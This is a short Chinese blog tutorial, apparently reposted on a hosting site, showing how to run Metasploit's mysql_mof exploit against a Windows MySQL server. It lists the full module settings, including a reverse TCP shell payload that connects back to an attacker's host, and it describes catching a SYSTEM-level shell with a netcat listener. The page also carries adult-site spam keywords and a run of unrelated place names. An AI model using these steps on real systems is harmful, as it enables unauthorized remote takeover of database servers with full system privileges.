91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

mysql mof+metasploit反彈shell

發布時間:2020-06-25 13:53:46 來源:網絡 閱讀:2741 作者:z2pp 欄目:MySQL數據庫

鑒于上篇文章 http://z2ppp.blog.51cto.com/11186185/1975985 mysql mof提權

metasploit已經有針對該方式的利用代碼,原理還是一樣生成mof文件,只是metasploit中可以使用到反彈技術,就不用額外添加用戶,前提是對方服務器允許訪問公網

use exploit/windows/mysql/mysql_mof
set password xxx    //設置登錄mysql的密碼
set username xxx    //設置登錄mysql的用戶
set rhost xxx       //設置要登錄的ip地址
set rport xxxx      //設置mysql的端口號
set payload windows/shell_reverse_tcp    //所使用的反彈模塊
set lhost xxx       //反彈到的ip地址
set lport xxx       //反彈到的端口
show options        //設置完成后,使用該命令可查看設置參數情況
exploit             //執行


mysql mof+metasploit反彈shell

如沒問題,即exploit執行

這邊我們使用nc監聽對應端口號,就可以接收到shell了,通常情況為system權限,因為mof文件是由system執行

mysql mof+metasploit反彈shell


錯誤之處,敬請指正

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

武鸣县| 介休市| 娱乐| 二连浩特市| 昌宁县| 三原县| 张家川| 耿马| 镇雄县| 高安市| 抚宁县| 崇左市| 新干县| 武威市| 永春县| 凤翔县| 阳城县| 兰考县| 绵阳市| 岳普湖县| 平潭县| 丘北县| 麻栗坡县| 洪泽县| 武穴市| 梧州市| 炉霍县| 麟游县| 香格里拉县| 焉耆| 依兰县| 德清县| 石台县| 邢台市| 宣化县| 澳门| 县级市| 邛崃市| 宜昌市| 东乡| 丽水市|